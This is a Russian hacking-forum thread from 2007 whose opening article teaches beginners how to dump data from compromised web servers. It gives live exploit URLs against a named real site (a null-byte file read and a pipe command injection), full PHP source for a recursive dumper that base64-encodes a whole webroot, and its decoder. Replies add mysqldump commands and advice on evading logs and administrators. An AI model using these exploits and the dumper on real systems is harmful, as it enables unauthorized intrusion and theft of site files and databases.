ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи > Авторские статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Дампим. Введение.
  #1  
Старый 06.03.2007, 21:00
Аватар для Talisman
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию Дампим. Введение.

Ну вот, взлом завершился удачно, точнее он еще завершился? Рут есть, а как думаешь инфу дампить будешь? Конечно, если ты это умеешь, то статья не для тебя, я в ней хочу рассказать о некоторых идеях и методах дампа - воистину святого слова!
Эта статья нацелена на начинающих дамперов - будем рассматривать дамп с веб-серверов, в принципе, от реального дампа сервера он почти ничем не отличается.
Большинство начинающих взломщиков опускают руки, когда на шелле видят почти всё большинство вкусных функций продизейбленными)
Итак, какие хорошие функции PHP нам могут вырубить?
во первых - системные вызовы, чтобы мы не могли юзать архиваторы ОС сервера.
Сейчас я хочу рассказать о двух принципиально различных видах дампа:
  1. когда дампер заливаем на сервер
  2. когда дампим через какую-нибудь багу (например, текстовый инклуд)
В первом случае мы добиваемся залития нашего кода в исполняемую диру на сервер - например какой-нибудь шелл, поддерживающий дамп. Самый лучший метод, хотя более палевный.
Плюсы:
  • более быстрый метод
  • с легкостью дампятся файлы любого типа
Минусы:
  • Возможный непреодолимый таймлимит на выполнение
  • палится наличие файла (если не инклудим дампер в память)
Подводные камни:
  • на время отдачи (можно решить скоростью скачки)
  • ну и более жестоко - размер отдаваемого содержимого, приходится разбивать на "партии"
Во втором случае (например - текстовый инклуд) нам нужно юзать дампер-клиент, который сам будет составлять запросы, обращаться к баге, и выдирать содержимое файла. Более медленный, менее палевный (смотря как посылать запросы - постом или гетом, не стоит ли идс на нагрузку к скриптам (например, быстро палится через веб-статистику))
Плюсы:
  • Пофиг на таймлимиты
  • более частая ошибка (хотя спорно)
  • связанных с БД таких ошибок больше.
  • более удобный интерфейс админки - можно подгружать только то, что нужно
Минусы:
  • Палится в логах (елси юзать гет - куча записей обращений) ну и в менеджерах статистики - пиковая нагрузка, даже если юзаем POST
  • сложнее в реализации
  • не всегда удобно(даже можно) дампить все типы файлов
  • иногда возникают значительные проблемы с перекодировкой
Подводные камни:
  • жестокие админы, непрерывно зырящие логи
  • "антидос" системы, тогда заметно снижается скорость... (
Теперь подробнее о методах реализации первого метода: из его описания должно быть все понятно - или возможность залить исполняемый код на сервер, или его проинклудить/исполнить.

Второй способ более красивый и частонаблюдаемый:
  • инъекция кода запроса к бд
  • ну и тупые инклудинги файлов (будь то новости и т.д.)
Но из-за некоторых сложностей в реализации большинство начинающих крякеров идут лесом, максимум что делают - пытаются надыбать конфиги форума, сайта... очень часто это помогает для дальнейшего проникновения и перехода к первому случаю.
Теперь примерчики ко 2му случаю:
типичная ошибка - открытие файла(будь то результаты голосования), как например тут:
Код:
http://www.neogame.ru/cgi-bin/vote/vote.pl?action=show&id=vote.pl%00

вместо:
Код:
http://www.neogame.ru/cgi-bin/vote/vote.pl?action=show&id=14-08-2005

тут использована типичная ошибка нулевого байта
ЗЫ тут специально опускаем фичу с вертикальной палкой:
Код:
http://www.neogame.ru/cgi-bin/vote/vote.pl?action=show&id=|ls%00
- просто выполняем команду )) т.е. можем перейти к 1 случаю.
аналогичные ошибки допускаются и в пхп-сценариях.
ну и классика - майсекл, статей полно, поэтому просто приведу ссылки: http://forum.antichat.ru/thread28461...%EF%E5%F0.html - очень вкусная вещь от Elekt

Вкусности:
http://forum.antichat.ru/thread32196...%EF%E5%F0.html - отличный дампер майсекл
ну и чтоб статья не была голословной по поводу самописок в первом случае - вот код дампера:
ЗЫ работает даже почти при всех продизейбленных функциях, что есть гуд.
PHP код:
<?php
  
function scan_dir($dirname
  { 
 echo 
base64_encode($dirname.';').';';
    GLOBAL 
$text$retext
    
$dir opendir($dirname); 
    while ((
$file readdir($dir)) !== false
    { 
      if(
$file != "." && $file != ".."
      { 
      if(
is_file($dirname."/".$file)) 
        { 
        
$f fopen($dirname.'/'.$file,"r");
        
$out=fread($f,filesize($dirname."/".$file));
        
fclose ($f);
        echo 
base64_encode($dirname.'/'.$file.';'.base64_encode($out)).';';
        } 
        if(
is_dir($dirname."/".$file)) 
        { 
          
scan_dir($dirname."/".$file); 
        } 
      } 
    } 
    
closedir($dir); 
  }
  
scan_dir('..');
?>
а вот декодер полученного дампа:
PHP код:
<?
set_time_limit
(0);
$datafile=file('data.txt');
$data='';
foreach(
$datafile as $dataline)
{
  
$data.=$dataline;
}
$files=explode(';',$data);
foreach(
$files as $bf)
{
          list(
$path,$out)=explode(";"base64_decode($bf));
          
$q=strpos(base64_decode($bf),';');
          
$path=substr(base64_decode($bf),0,$q);
          
$out=substr(base64_decode($bf),$q+1);
          
$path=substr($path,3);
echo 
$path;
        if(
$out=='')
        { 
        
mkdir('mai/2/'.$path);
}else{
        echo 
'mai/2/'.$path;
        
$f fopen('mai/2/'.$path,"a");
        
fputs ($f,$out);
        
fclose ($f);
        }

}
?>
идея элементарная - рекурсивно проходимся по директориям веб-сервера, при заходе в директорию добавляем в дамп ее имя закодированной бейс64 (для надежности ) ну и если в директории есть файлы, выводим имя файла; дамп файла тоже в бейс 64.
Ну а декодер проделывает все в обратном порядке)

Отмазки: за то, как вы это используете я не отвечаю и отвечать не буду. Код предоставлен как есть ну и статья - повод для размышлений.

Последний раз редактировалось Thanat0z; 08.03.2007 в 17:26.. Причина: исправил ошибки
 
Ответить с цитированием

  #2  
Старый 06.03.2007, 21:14
Аватар для flipper
flipper
Участник форума
Регистрация: 05.09.2006
Сообщений: 184
Провел на форуме:
888851

Репутация: 203
По умолчанию

Что бы базу слить можно в консоли набрать:
mysqldump -uroot imyaBD > imyaBD.sql
Если рут есть, или если прав хватает...

Последний раз редактировалось flipper; 06.03.2007 в 21:33..
 
Ответить с цитированием

  #3  
Старый 06.03.2007, 21:45
Аватар для Talisman
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

2 flipper:
да) логическая ошибка - в начале спрашиваю про рут, а потом напоминаю про дизабленные функции.
просто если уже есть рут, то дамп - не проблема как правило, главное синтаксис знать
 
Ответить с цитированием

  #4  
Старый 06.03.2007, 23:20
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

черный на темно срером...
не видно не фига отредактируй цвет шрифта...
 
Ответить с цитированием

  #5  
Старый 06.03.2007, 23:37
Аватар для Talisman
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию

спс, не заметил... у меня моник отлично выделяет просто
 
Ответить с цитированием

  #6  
Старый 07.03.2007, 00:10
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

если база весит 4-5гигов то поможет только
mysqldump -uuser -ppass base.table > dump.sql
 
Ответить с цитированием

  #7  
Старый 07.03.2007, 21:59
Аватар для DRON-ANARCHY
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

если база весит 4-5гигов а у вас мопед, то уже ниче не поможет)
 
Ответить с цитированием

  #8  
Старый 07.03.2007, 22:03
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

поможет win/nix дедик.
 
Ответить с цитированием

  #9  
Старый 07.03.2007, 22:04
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

2 DRON-ANARCHY
поможет волшебная связка tar+gzip +)
__________________
 
Ответить с цитированием

  #10  
Старый 07.03.2007, 22:09
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

у каждого свои способы....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Прямое введение команд в Sql сервер k00p3r Чужие Статьи 1 13.06.2005 21:05
Введение в cgi-security k00p3r Чужие Статьи 0 09.06.2005 19:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ